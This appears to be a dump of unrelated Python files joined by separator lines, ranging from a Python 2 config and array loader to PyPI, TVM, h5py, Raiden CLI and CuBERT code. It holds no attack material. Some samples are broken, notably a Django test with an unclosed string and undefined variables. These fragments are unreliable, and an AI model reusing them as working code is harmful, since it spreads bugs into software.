if lengthforst < minlengthforst or -1 == minlengthforst:
actualignorestring = st
minlengthforst = lengthforst
tokstring = ""
if actualignorestring:
linelist = tmp.split(actualignorestring)
if len(linelist[1])>1:
comments = actualignorestring + actualignorestring.join(linelist[1:])
tokstring = linelist[0]
else:
tokstring = tmp
if delimstrings== "":
tokens = tokstring.split()
else:
#print "delimstring " , delimstrings
tokens = map(lambda x: x.strip(), tokstring.split(delimstrings))
ret = ( tokens , comments)
return ret
def builddict(fname,
ignorestrings=['#'],
dictdelim='=',
startblock = None,
endblock =None):
"""builddict (fname) reads in the file with filename
fname, and builds a dictionary of keys vs values from
it
args:
fname: mandatory, string
filename from which the dictionary is to be built
ignorestring: optional, string, defaults to ["#"]
list of strings, after which the remaining part of
the line should be ignored.
dictdelim: optional, string, defaults to '='
delimiter used to separate keys, values
in building the dictionary
startblock = optional, string, defaults to None
Can do a replace within only the starting and ending
blocks but both must be provided. These blocks can
start with a comment string
endblock = string, optional, defaults to None
Can do a replace within only the starting and ending
blocks but both must be provided. These blocks can
start with a comment string
returns:
dictionary of keys and values (in strings)
example usage :
builddict ( fname)
status:
Seems to work correctly, tested on CAMB params.ini,
R. Biswas, July 08, 2012
That was in configdict. Rewritten to use ioutilst, not tested
yet,
R. Biswas, Aug 09, 2012
"""
f = open(fname, "r")
line = f.readline()
i = 0
#print ignorestrings
paramdict={}
readin = False
while line != '':
if startblock:
if (readin ==False):
if line.find(startblock) !=-1:
readin = True
else:
readin =True
if readin == False:
line = f.readline()
continue
#while line != '':
tmp = _tokenizeline(line, ignorestrings=ignorestrings,
delimstrings=dictdelim)
#print line , tmp
tmp = tmp[0]
if len(tmp) >1:
key = tmp[0].strip()
#print key, tmp
val = tmp[1].strip()
paramdict[str(key)] = str(val)
line=f.readline()
if endblock and line.find(endblock) !=-1:
readin = False
#print "FOUND ENDBLOCK"
continue
f.close()
return paramdict
def loadfile2array(fname,
datastrings = [],
datadelims = "",
ignorestrings = ["#"],
ignorelines = [],
ignorecols = [] ,
usecols = [],
usecoldicts = [],
validatetable = True,
converttofloat =False,
keys = None ,
makeintfloats = False,
verbose = False,
extension =''):
"""loadfiletoarray loads a (part) of a ASCII file to a list or a
numpy array.
args:
fname: mandatory , string
name of file which is to be read
eg. "FITOPT001.FITRES
datastrings: optional, list of strings, defaults to []
if not an empty list, contains strings with which
the lines containing data to be turned into a np
array.
datadelims: optional, string, defaults to ""
if equal to "" (default) the data delimiters are
assumed to be whitespace. Otherwise this string
has to be specified (eg for a CSV)
ignorelines: optional, list of integers, defaults to []
list of file linenumbers on the file which will be
ignored. These linenumbers start from 1 and match
the line numbers shown by vi
ignorestrings: optional, list of strings, defaults to []
if not an empyty list, contains strings after which
a line will not be read in
usecols: optional, list of integers, defaults to []
only load these cols into the array
ignorecols: optional, list of integers, defaults to []
do not load these cols into the array.
NB: It is expected that none or only one of
usecols, and ignorecols will be used
usecoldicts: optional, list of integers , defaults to []
col number of a set of strings that could be used
to identify the row
validatetable: optional, defaults to True
if True, checks that the number of elements in mylist
for each row is the same. On success it returns a return
code of 0, else a return code of 1
converttofloat: optional, defaults to False
if True, then it converts the Table to a numpy
array of floats
if False, the it leaves the table as a list of strings
verbose:
optional, bool, defaults to False
if True, turns on vmode, printing out messages.
extension: optional, defaults to ""
if 'gz', uses the gzip library to open gzipped files
returns:
tuple
if converttofloat == True,
(numpy structued 2D array , list of strings,
returncode )
else ,
(list of list of strings ,
empty list of strings , returncode)
returncode = 0 , everything checked out
= 1 , terrible failure
I PLAN TO KEEP returncode AS THE LAST ENTRY
OF THE TUPLE, R. Biswas, July 18, 2012
example usage:
(data , dictlist , returncode) =
io.loadfiletoarray("FITOPT001.FITRES",
datastrings=["SN"],
ignorecols=[0,1],
converttofloat=True,
usecoldicts = [0,1])
status:
tested using testio.py
Most features seem to work
R. Biswas, July 18, 2012
updated this routine to put in a real coldict. Have no idea
why I wrote the return values the way they were. Got rid of
dictlist and have a col. I don't see the point of having
multiple values in the dictionary
R. Biswas, Aug 11,2012
rewritten from loadfiletoarray to use a numpy structured array
R. Biswas, Mon Mar 25 00:31:47 CDT 2013
Fixed bug that arose when a column had inconsistent types, eg.
starting with int but then incorporating strings (as in
cids) by looking at the entire column.
R. Biswas, Mon Mar 25 09:06:14 CDT 2013
"""
import numpy as np
import gzip
vmode = False
if verbose :
vmode = True
if extension=="":
f = open(fname,"r")
elif extension == "gz":
f = gzip.open(fname,"rb")
else:
"Don't know what this extension is"
return 1
line = f.readline()
linenum = 1
mylist = []
numelems = 0 #Number of elements in each row of the list
numtokens = 0
if vmode:
print "INPUTS "
print "datastrings", "usecols", "ignorecols"
print datastrings, usecols , ignorecols , "\n"
while line!="":
if verbose:
print 'iterating line loop'
tokens = []
newtoken = False
currentline = line
line = f.readline() #CHECK
linenum +=1
if vmode:
print "Linenum = ", linenum
print "corresponding line = ", currentline +"\n"
# Leave out lines that we don't want
if linenum in ignorelines:
if vmode:
print "Ignoring line ", currentline, "in ignorelines ", ignorelines
continue
if any(map(lambda x: currentline.startswith(x),ignorestrings)):
if vmode:
print "Ignoring line ", currentline, "starting with ignorestrings ", ignorestrings
continue
#If there is a datastring
if len(datastrings)==0:
#orig tokens , comments = tokenizeline (currentline,
tokens , comments = tokenizeline (currentline,
ignorestrings = ignorestrings,
delimstrings = datadelims)
newtoken = True
numtokens = len(tokens)
if vmode:
print "in line no "+ linenum + numtokens +"tokens were found"
elif any(map(lambda x: currentline.startswith(x),datastrings)):
#orig tokens, comments = tokenizeline (currentline,
tokens, comments = tokenizeline (currentline,
ignorestrings = ignorestrings,
delimstrings = datadelims)
if vmode:
print "current line ", currentline + " tokenized to ", tokens
newtoken = True
numtokens = len(tokens)
else:
pass
if validatetable:
if numelems == 0:
numelems = numtokens
if numelems != numtokens:
return ([], [] ,1 )
if newtoken:
if vmode:
print "new tokens found of length" , len(tokens)
print "These tokens are " , tokens
if len(tokens)>0:
mylist.append(tokens)
#line = f.readline()
#print line , "\n", tokens
if verbose:
print "mylist now of length ", len(mylist)
print "mylist = " ,mylist
f.close()
if vmode:
print "printing mylist[0]"
print mylist[0]
cutlist =[]
dictlist = []
coldict = {}
###Choose Columns for list
if len(ignorecols) > 0:
usecols = [i for i in range(len(mylist[0])) if i not in ignorecols]
if vmode:
print len(mylist[0])
print len(usecols)
cutlistiter = 0
if (len(usecols) < len(mylist[0])) and (len(usecols)!=0):
for row in mylist:
cutrow = [row[i] for i in range(len(row)) if i in usecols]
cutlist.append(cutrow)
#print usecoldicts
if len(usecoldicts) > 0:
dictrow = [row[i] for i in range(len(row)) if i in usecoldicts]
dictlist.append(dictrow)
coldict[dictrow[0]] = cutlistiter
cutlistiter +=1
else:
cutlist = mylist
### Assuming things can be turned into floats
if converttofloat:
### Check the data types of 1st row
types = getdatatypes(cutlist, keys = keys,makeintfloats =makeintfloats)
#print types
#print cutlist
#print len(cutlist)
cutarray = np.zeros(len(cutlist),dtype=types)
#print len(cutarray)
for i in range(len(cutlist)):
#map(float, cutlist[i])
#cutarray[i] = np.array(map(float,cutlist[i]))
#print len(cutlist)
cutarray[i] = tuple(cutlist[i])
#print i, len(cutlist[i]), len(cutarray[i])
#print cutlist[i]
#print cutarray[i]
#print "length of array ", len(cutarray)
#return (cutarray ,dictlist , 0 )
return (cutarray ,coldict , 0 )
#return (cutlist , dictlist , 0 )
return (cutlist , coldict , 0 )
if __name__ == "__main__":
myline = "KJAHS KH AKJHS jjhJH. JH HJ JHH JH #tests "
(lst , comment ) = tokenizeline(myline, delimstrings = ".")
print lst
print comment
print "######################################################\n"
print "######################################################\n"
print "######################################################\n"
print "######################################################\n"
print "Test build dict"
haccdict = builddict (fname = "example_data/indat.params",
dictdelim = " ")
print haccdict
|
"""2017 - Day 11 Part 2: Hex Edh test."""
from src.year2017.day11b import solve
def test_solve():
assert solve("n,n,n,s") == 3
|
import re
import os
import config
def clear_screen():
os.system('cls' if config.OS == 'Windows' else 'clear')
def emoji_dealer(d):
regex = re.compile('^(.*?)(?:<span class="emoji (.*?)"></span>(.*?))+$')
match = re.findall(regex, d['NickName'])
if len(match) > 0: d['NickName'] = ''.join(match[0])
return d
def check_file(fileDir):
try:
with open(fileDir): pass
return True
except:
return False
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
@pytest.mark.parametrize("action", ["submit", "submit_pkg_info"])
def test_removed_upload_apis(webtest, action):
resp = webtest.post("/legacy/?:action={}".format(action), status=410)
assert resp.status == (
"410 Project pre-registration is no longer required or supported, "
"upload your files instead."
)
def test_remove_doc_upload(webtest):
resp = webtest.post("/legacy/?:action=doc_upload", status=410)
assert resp.status == (
"410 Uploading documentation is no longer supported, we recommend "
"using https://readthedocs.org/."
)
def test_doap(webtest):
resp = webtest.get("/pypi?:action=doap&name=foo&version=1.0", status=410)
assert resp.status == "410 DOAP is no longer supported."
|
from templates.Templates import Template
|
from setuptools import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name = 'AirLibre',
py_modules = ['AirLibre'],
install_requires = required,
version = '0.0.2',
description = 'UBNT Config API',
author = 'Nathan Shimp',
author_email = 'johnnshimp@gmail.com',
classifiers = [
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'License :: Apache 2',
'Operating System :: OS Independent',
'Development Status :: Pre-Alpha',
'Topic :: Utilities'
]
)
|
from rotkehlchen.assets.asset import Asset, EthereumToken
from rotkehlchen.constants.misc import ZERO
from rotkehlchen.fval import FVal
from rotkehlchen.tests.utils.rotkehlchen import BalancesTestSetup
from rotkehlchen.utils.misc import from_wei, satoshis_to_btc
def get_asset_balance_total(asset_symbol: str, setup: BalancesTestSetup) -> FVal:
conversion_function = satoshis_to_btc if asset_symbol == 'BTC' else from_wei
total = ZERO
asset = Asset(asset_symbol)
if asset.is_fiat():
total += setup.fiat_balances.get(asset_symbol, ZERO)
elif asset_symbol in ('ETH', 'BTC'):
asset_balances = getattr(setup, f'{asset_symbol.lower()}_balances')
total += sum(conversion_function(FVal(b)) for b in asset_balances)
elif EthereumToken(asset_symbol):
asset_balances = setup.token_balances[asset_symbol]
total += sum(conversion_function(FVal(b)) for b in asset_balances)
else:
raise AssertionError(f'not implemented for asset {asset_symbol}')
total += setup.binance_balances.get(asset_symbol, ZERO)
total += setup.poloniex_balances.get(asset_symbol, ZERO)
return total
|
from django.test import TestCase
# Create your tests here.
from .models import Profile,Neighbourhood,Post
from django.contrib.auth.models import User
import datetime as dt
class ProfileTestClass(TestCase):
'''
images test method
'''
def setUp(self):
self.user = User.objects.create(id =1,username='fidie')
self.profile = Profile(firstname = ' Fidela',lastname = 'keziah,profile_photo = 'babyb.jpeg',bio = 'Nice',date = '5.5.2121', user = self.user)
def test_instance(self):
self.assertTrue(isinstance(self.profile,Profile))
def test_save_method(self):
'''
test image by save
'''
self.profile.save_profile()
profile=Profile.objects.all()
self.assertTrue(len(profile)>=1)
def test_delete_method(self):
'''
test of delete image
'''
self.profile.save_profile()
profile=Profile.delete_profile()
profile=Profile.objects.all()
self.assertTrue(len(profile)>=0)
class NeighbourhoodTestClass(TestCase):
def setUp(self):
self.neighbourhood=Neighbourhood.objects.create(neighbourhood='goood')
def test_instance(self):
self.assertTrue(isinstance(self.neighbourhood,Neighbourhood))
def test_save_method(self):
'''
test image by save
'''
self.neighbourhood.save_neighbourhoods()
neighbourhood=Neighbourhood.objects.all()
self.assertTrue(len(comm)>0)
class PostTestClass(TestCase):
'''
images test method
'''
def setUp(self):
self.post = Post(user ='rita', name='test', neighborhood='good')
# Testing Instance
def test_instance(self):
self.assertTrue(isinstance(self.post,Post))
# Testing the save method
def test_save_method(self):
self.post=Post(name='cat',user=self.user1,likes="1",post="image")
self.e.save_post()
post = Post.objects.all()
self.assertTrue(len(post) >= 1)
|
"""
Plugin for OpenStack compute / Rackspace cloud server mock.
"""
from mimic.rest.nova_api import NovaApi
nova = NovaApi()
|
import pytest
import smartsheet
@pytest.mark.usefixtures("smart_setup")
class TestZSearch:
"""Sometimes these pass, sometimes they don't.
As the documentation says, items recently created may not
be searchable right away.
So, we test for successful request, successful creation of
SearchResult object, and that's it.
Non-automated testing can be used with these two methods
to ensure functionality.
"""
def test_search_sheet(self, smart_setup):
smart = smart_setup['smart']
result = smart.Search.search_sheet(
smart_setup['sheet_b'].id,
'Nike'
)
assert result.request_response.status_code == 200
assert result.total_count >= 0
assert isinstance(result, smart.models.search_result.SearchResult)
def test_search(self, smart_setup):
smart = smart_setup['smart']
result = smart.Search.search('Google')
assert result.request_response.status_code == 200
assert result.total_count >= 0
assert isinstance(result, smart.models.search_result.SearchResult)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
from tvm import relay
from tvm.relay import transform
def test_dup_type():
a = relay.TypeVar("a")
av = relay.Var("av", a)
make_id = relay.Function([av], relay.Tuple([av, av]), None, [a])
t = relay.scalar_type("float32")
b = relay.Var("b", t)
mod = tvm.IRModule.from_expr(make_id(b))
mod = transform.InferType()(mod)
inferred = mod["main"].body
assert inferred.checked_type == relay.TupleType([t, t])
def test_id_type():
mod = tvm.IRModule()
id_type = relay.GlobalTypeVar("id")
a = relay.TypeVar("a")
mod[id_type] = relay.TypeData(id_type, [a], [])
b = relay.TypeVar("b")
make_id = relay.Var("make_id", relay.FuncType([b], id_type(b), [b]))
t = relay.scalar_type("float32")
b = relay.Var("b", t)
mod["main"] = relay.Function([make_id, b], make_id(b))
mod = transform.InferType()(mod)
assert mod["main"].body.checked_type == id_type(t)
if __name__ == "__main__":
test_dup_type()
test_id_type()
|
from __future__ import unicode_literals
__version__ = '2021.11.29'
|
from cc3d import CompuCellSetup
from .diffusion_2D_steppables_player import ExtraFieldVisualizationSteppable
CompuCellSetup.register_steppable(steppable=ExtraFieldVisualizationSteppable(frequency=10))
CompuCellSetup.run()
|
#!/usr/bin/env python
import Tkinter as Tk
root=Tk.Tk()
root.title(u"winfo")
def f_btn():
print("width=%d height=%d" % (root.winfo_width(), root.winfo_height()))
btn=Tk.Button(root, text="window size", width=30)
btn.pack()
btn["command"]=f_btn
root.mainloop()
|
# -*- coding: utf-8 -*-
# Copyright 2013 Pierre de Buyl
# Copyright 2013 Konrad Hinsen
#
# This file is part of pyh5md
#
# pyh5md is free software and is licensed under the modified BSD license (see
# LICENSE file).
# This file is based on code from the h5py project. The complete h5py license is
# available at licenses/h5py.txt, in the distribution root directory.
import numpy
import h5py
import h5py.version
from h5py import h5s, h5t, h5r, h5d
from h5py._hl import dataset
from h5py._hl.base import HLObject
from h5py._hl import filters
from h5py._hl import selections as sel
from h5py._hl import selections2 as sel2
def create_compact_dataset(loc, name, shape=None, dtype=None, data=None,
chunks=None, compression=None, shuffle=None,
fletcher32=None, maxshape=None,
compression_opts=None, fillvalue=None,
scaleoffset=None, track_times=None):
"""Create a new HDF5 dataset with a compact storage layout."""
# Convert data to a C-contiguous ndarray
if data is not None:
import h5py._hl.base
data = numpy.asarray(data, order="C", dtype=h5py._hl.base.guess_dtype(data))
# Validate shape
if shape is None:
if data is None:
raise TypeError("Either data or shape must be specified")
shape = data.shape
else:
shape = tuple(shape)
if data is not None and (numpy.product(shape) != numpy.product(data.shape)):
raise ValueError("Shape tuple is incompatible with data")
if isinstance(dtype, h5py.Datatype):
# Named types are used as-is
tid = dtype.id
dtype = tid.dtype # Following code needs this
else:
# Validate dtype
if dtype is None and data is None:
dtype = numpy.dtype("=f4")
elif dtype is None and data is not None:
dtype = data.dtype
else:
dtype = numpy.dtype(dtype)
tid = h5t.py_create(dtype, logical=1)
# Legacy
if any((compression, shuffle, fletcher32, maxshape,scaleoffset)) and chunks is False:
raise ValueError("Chunked format required for given storage options")
# Legacy
if compression is True:
if compression_opts is None:
compression_opts = 4
compression = 'gzip'
# Legacy
if compression in range(10):
if compression_opts is not None:
raise TypeError("Conflict in compression options")
compression_opts = compression
compression = 'gzip'
if h5py.version.version_tuple >= (2, 2, 0, ''):
dcpl = filters.generate_dcpl(shape, dtype, chunks, compression,
compression_opts, shuffle, fletcher32,
maxshape, None)
else:
dcpl = filters.generate_dcpl(shape, dtype, chunks, compression,
compression_opts, shuffle, fletcher32,
maxshape)
if fillvalue is not None:
fillvalue = numpy.array(fillvalue)
dcpl.set_fill_value(fillvalue)
if track_times in (True, False):
dcpl.set_obj_track_times(track_times)
elif track_times is not None:
raise TypeError("track_times must be either True or False")
dcpl.set_layout(h5d.COMPACT)
if maxshape is not None:
maxshape = tuple(m if m is not None else h5s.UNLIMITED for m in maxshape)
sid = h5s.create_simple(shape, maxshape)
dset_id = h5d.create(loc.id, None, tid, sid, dcpl=dcpl)
if data is not None:
dset_id.write(h5s.ALL, h5s.ALL, data)
dset = dataset.Dataset(dset_id)
if name is not None:
loc[name] = dset
return dset
|
import errno
import os
import re
import sys
from ipaddress import IPv4Address, AddressValueError
from itertools import groupby
from pathlib import Path
from string import Template
from typing import Callable, List, Union, Any, Dict
import click
import pytoml
from click._compat import term_len
from click.formatting import iter_rows, measure_table, wrap_text
from pytoml import TomlError
from raiden.utils import address_checksum_and_decode
from raiden.constants import NETWORKNAME_TO_ID
from raiden.exceptions import InvalidAddress
LOG_CONFIG_OPTION_NAME = 'log_config'
class HelpFormatter(click.HelpFormatter):
"""
Subclass that allows multiple (option) sections to be formatted with pre-determined
widths.
"""
def write_dl(self, rows, col_max=30, col_spacing=2, widths=None):
"""Writes a definition list into the buffer. This is how options
and commands are usually formatted.
:param rows: a list of two item tuples for the terms and values.
:param col_max: the maximum width of the first column.
:param col_spacing: the number of spaces between the first and
second column.
:param widths: optional pre-calculated line widths
"""
rows = list(rows)
if widths is None:
widths = measure_table(rows)
if len(widths) != 2:
raise TypeError('Expected two columns for definition list')
first_col = min(widths[0], col_max) + col_spacing
for first, second in iter_rows(rows, len(widths)):
self.write('%*s%s' % (self.current_indent, '', first))
if not second:
self.write('\n')
continue
if term_len(first) <= first_col - col_spacing:
self.write(' ' * (first_col - term_len(first)))
else:
self.write('\n')
self.write(' ' * (first_col + self.current_indent))
text_width = max(self.width - first_col - 2, 10)
lines = iter(wrap_text(second, text_width).splitlines())
if lines:
self.write(next(lines) + '\n')
for line in lines:
self.write('%*s%s\n' % (
first_col + self.current_indent, '', line))
else:
self.write('\n')
class Context(click.Context):
def make_formatter(self):
return HelpFormatter(width=self.terminal_width, max_width=self.max_content_width)
class CustomContextMixin:
""" Use above context class instead of the click default """
def make_context(self, info_name, args, parent=None, **extra):
"""
This function when given an info name and arguments will kick
off the parsing and create a new :class:`Context`. It does not
invoke the actual command callback though.
:param info_name: the info name for this invokation. Generally this
is the most descriptive name for the script or
command. For the toplevel script it's usually
the name of the script, for commands below it it's
the name of the script.
:param args: the arguments to parse as list of strings.
:param parent: the parent context if available.
:param extra: extra keyword arguments forwarded to the context
constructor.
"""
for key, value in iter(self.context_settings.items()):
if key not in extra:
extra[key] = value
ctx = Context(self, info_name=info_name, parent=parent, **extra)
with ctx.scope(cleanup=False):
self.parse_args(ctx, args)
return ctx
class GroupableOption(click.Option):
def __init__(
self,
param_decls=None,
show_default=False,
prompt=False,
confirmation_prompt=False,
hide_input=False,
is_flag=None,
flag_value=None,
multiple=False,
count=False,
allow_from_autoenv=True,
type=None,
help=None,
option_group=None,
**attrs,
):
super().__init__(
param_decls,
show_default,
prompt,
confirmation_prompt,
hide_input,
is_flag,
flag_value,
multiple,
count,
allow_from_autoenv,
type,
help,
**attrs,
)
self.option_group = option_group
class GroupableOptionCommand(CustomContextMixin, click.Command):
def format_options(self, ctx, formatter):
def keyfunc(o):
value = getattr(o, 'option_group', None)
return value if value is not None else ''
grouped_options = groupby(
sorted(
self.get_params(ctx),
key=keyfunc,
),
key=keyfunc,
)
options = {}
for option_group, params in grouped_options:
for param in params:
rv = param.get_help_record(ctx)
if rv is not None:
options.setdefault(option_group, []).append(rv)
if options:
widths_a, widths_b = list(
zip(*[measure_table(group_options) for group_options in options.values()]),
)
widths = (max(widths_a), max(widths_b))
for option_group, group_options in options.items():
with formatter.section(option_group if option_group else 'Options'):
formatter.write_dl(group_options, widths=widths)
class GroupableOptionCommandGroup(CustomContextMixin, click.Group):
def format_options(self, ctx, formatter):
GroupableOptionCommand.format_options(self, ctx, formatter)
self.format_commands(ctx, formatter)
def command(self, *args, **kwargs):
return super().command(*args, **{'cls': GroupableOptionCommand, **kwargs})
def group(self, *args, **kwargs):
return super().group(*args, **{'cls': self.__class__, **kwargs})
def command(name=None, cls=GroupableOptionCommand, **attrs):
return click.command(name, cls, **attrs)
def group(name=None, **attrs):
return click.group(name, **{'cls': GroupableOptionCommandGroup, **attrs})
def option(*args, **kwargs):
return click.option(*args, **{'cls': GroupableOption, **kwargs})
def option_group(name: str, *options: List[Callable]):
def decorator(f):
for option_ in reversed(options):
for closure_cell in option_.__closure__:
if isinstance(closure_cell.cell_contents, dict):
closure_cell.cell_contents['option_group'] = name
break
option_(f)
return f
return decorator
class AddressType(click.ParamType):
name = 'address'
def convert(self, value, param, ctx):
try:
return address_checksum_and_decode(value)
except InvalidAddress as e:
self.fail(str(e))
class LogLevelConfigType(click.ParamType):
name = 'log-config'
_validate_re = re.compile(
r'^(?:'
r'(?P<logger_name>[a-zA-Z0-9._]+)?'
r':'
r'(?P<logger_level>debug|info|warn(?:ing)?|error|critical|fatal)'
r',?)*$',
re.IGNORECASE,
)
def convert(self, value, param, ctx):
if not self._validate_re.match(value):
self.fail('Invalid log config format')
level_config = dict()
if value.strip(' ') == '':
return None # default value
for logger_config in value.split(','):
logger_name, logger_level = logger_config.split(':')
level_config[logger_name] = logger_level.upper()
return level_config
class NATChoiceType(click.Choice):
def convert(self, value, param, ctx):
if value.startswith('ext:'):
ip, _, port = value[4:].partition(':')
try:
IPv4Address(ip)
except AddressValueError:
self.fail('invalid IP address: {}'.format(ip), param, ctx)
if port:
try:
port = int(port, 0)
except ValueError:
self.fail('invalid port number: {}'.format(port), param, ctx)
else:
port = None
return ip, port
return super().convert(value, param, ctx)
class NetworkChoiceType(click.Choice):
def convert(self, value, param, ctx):
if isinstance(value, str) and value.isnumeric():
try:
return int(value)
except ValueError:
self.fail(f'invalid numeric network id: {value}', param, ctx)
else:
network_name = super().convert(value, param, ctx)
return NETWORKNAME_TO_ID[network_name]
class MatrixServerType(click.Choice):
def convert(self, value, param, ctx):
if value.startswith('http'):
return value
return super().convert(value, param, ctx)
class HypenTemplate(Template):
idpattern = r'(?-i:[_a-zA-Z-][_a-zA-Z0-9-]*)'
class PathRelativePath(click.Path):
"""
`click.Path` subclass that can default to a value depending on
another option of type `click.Path`.
Uses :ref:`string.Template` to expand the parameters default value.
Example::
@click.option('--some-dir', type=click.Path())
@click.option('--some-file', type=PathRelativePath(), default='${some-dir}/file.txt')
"""
def convert(self, value, param, ctx):
if value == param.default:
try:
value = self.expand_default(value, ctx.params)
except KeyError as ex:
raise RuntimeError(
'Subsitution parameter not found in context. '
'Make sure it\'s defined with `is_eager=True`.' # noqa: C812
) from ex
return super().convert(value, param, ctx)
@staticmethod
def expand_default(default, params):
return HypenTemplate(default).substitute(params)
def apply_config_file(
command_function: Union[click.Command, click.Group],
cli_params: Dict[str, Any],
ctx,
config_file_option_name='config_file',
):
""" Applies all options set in the config file to `cli_params` """
paramname_to_param = {param.name: param for param in command_function.params}
path_params = {
param.name
for param in command_function.params
if isinstance(param.type, (click.Path, click.File))
}
config_file_path = Path(cli_params[config_file_option_name])
config_file_values = dict()
try:
with config_file_path.open() as config_file:
config_file_values = pytoml.load(config_file)
except OSError as ex:
# Silently ignore if 'file not found' and the config file path is the default
config_file_param = paramname_to_param[config_file_option_name]
config_file_default_path = Path(
config_file_param.type.expand_default(config_file_param.get_default(ctx), cli_params),
)
default_config_missing = (
ex.errno == errno.ENOENT and
config_file_path.resolve() == config_file_default_path.resolve()
)
if default_config_missing:
cli_params['config_file'] = None
else:
click.secho(f"Error opening config file: {ex}", fg='red')
sys.exit(1)
except TomlError as ex:
click.secho(f'Error loading config file: {ex}', fg='red')
sys.exit(1)
for config_name, config_value in config_file_values.items():
config_name_int = config_name.replace('-', '_')
if config_name_int not in paramname_to_param:
click.secho(
f"Unknown setting '{config_name}' found in config file - ignoring.",
fg='yellow',
)
continue
if config_name_int in path_params:
# Allow users to use `~` in paths in the config file
config_value = os.path.expanduser(config_value)
if config_name_int == LOG_CONFIG_OPTION_NAME:
# Uppercase log level names
config_value = {k: v.upper() for k, v in config_value.items()}
else:
# Pipe config file values through cli converter to ensure correct types
# We exclude `log-config` because it already is a dict when loading from toml
try:
config_value = paramname_to_param[config_name_int].type.convert(
config_value,
paramname_to_param[config_name_int],
ctx,
)
except click.BadParameter as ex:
click.secho(f"Invalid config file setting '{config_name}': {ex}", fg='red')
sys.exit(1)
# Use the config file value if the value from the command line is the default
if cli_params[config_name_int] == paramname_to_param[config_name_int].get_default(ctx):
cli_params[config_name_int] = config_value
ADDRESS_TYPE = AddressType()
LOG_LEVEL_CONFIG_TYPE = LogLevelConfigType()
|
def findThreeLargestNumbers(array):
# Write your code here.
numList = [None, None, None]
for i in array:
compareThreeLargest(i, numList)
return numList
def compareThreeLargest(num, numList):
if numList[2] is None or num > numList[2]:
updateList(num, 2, numList)
elif numList[1] is None or num > numList[1]:
updateList(num, 1, numList)
elif numList[0] is None or num > numList[0]:
updateList(num, 0, numList)
def updateList(num, idx, array):
for i in range(idx+1):
if idx == i:
array[i] = num
else:
array[i] = array[i+1]
# def findThreeLargestNumbers(array):
# # Write your code here.
# ordArray = []
# # O(n)
# for idx in range(3):
# maxInt = array.pop(array.index(max(array)))
# ordArray.append(maxInt)
# return ordArray[::-1]
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts the CuBERT Function Docstring Classification dataset to PLUR."""
import itertools
from typing import Any, List, Mapping, MutableSequence, Optional
from plur.stage_1 import cubert_dataset
from plur.utils.graph_to_output_example import GraphToOutputExample
from cubert import code_to_subtokenized_sentences
def _truncate_seq_pair(tokens_a: MutableSequence[str],
tokens_b: MutableSequence[str], max_length: int) -> None:
"""BERT's truncation of two token sequences."""
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
class CuBertFunctionDocstringClassificationDataset(cubert_dataset.CuBertDataset
):
"""Converts CuBERT Function Docstring Classification data to a PLUR dataset.
The dataset is created by: Aditya Kanade, Petros Maniatis, Gogul Balakrishnan,
Kensen Shi Proceedings of the 37th International Conference on Machine
Learning, PMLR 119:5110-5121, 2020.
The task is to predict whether a function and a docstring match, or if they
come from distinct contexts.
The context consists of the body of a Python function and a docstring. This
context is tokenized using the CuBERT Python tokenizer, and encoded as
WordPiece vocabulary IDs from the CuBERT-released Python vocabulary. The graph
representation is as a chain of nodes, each holding a WordPiece subtoken. The
output is one of the two classification labels. We use separate node types
for docstrings and for function bodies.
"""
ALL_CLASSES = frozenset((
'Correct',
'Incorrect',
))
def folder_path(self) -> str:
"""As per superclass."""
return '20200621_Python/function_docstring_datasets/'
def dataset_name(self) -> str:
"""As per superclass."""
return 'cubert_function_docstring_classification_dataset'
def dataset_description(self) -> str:
"""As per superclass."""
return """From CuBERT website:
Here we describe the 6 Python benchmarks we created. All 6 benchmarks were
derived from ETH Py150 Open. All examples are stored as sharded text files.
Each text line corresponds to a separate example encoded as a JSON object. For
each dataset, we release separate training/validation/testing splits along the
same boundaries that ETH Py150 Open splits its files to the corresponding
splits. The fine-tuned models are the checkpoints of each model with the
highest validation accuracy.
Combinations of functions with their correct or incorrect documentation
string, used to train a classifier that can tell which pairs go together. The
JSON fields are:
function: string, the source code of a function as text
docstring: string, the documentation string for that function
label: string, one of (“Incorrect”, “Correct”), the label of the example.
info: string, an unformatted description of how the example was constructed,
including the source dataset (always “ETHPy150Open”), the repository and
filepath, the function name and, for “Incorrect” examples, the function
whose docstring was substituted.
"""
def data_to_graph_to_output_example(
self, data: Mapping[str, Any],
max_graph_size: int,
split: str) -> Optional[GraphToOutputExample]:
"""Convert data example to the unified GraphToOutputExample data structure.
The input is a function string, and the output is a class.
There are no edges in this task, since it was targeting BERT.
Args:
data: A dictionary with 'function', 'docstring', 'label', and 'info' as
keys.
max_graph_size: The maximum number of input nodes allowed for the example.
split: The split of the example.
Raises:
GraphToOutputExampleNotValidError if the GraphToOutputExample is not
valid.
Returns:
A GraphToOutputExample.
"""
del split # Unused.
function = data['function']
docstring = data['docstring']
label = data['label']
assert label in self.ALL_CLASSES
provenance = data['info']
graph_to_output_example = GraphToOutputExample()
# The input graph nodes are the source code tokens and docstring. We don't
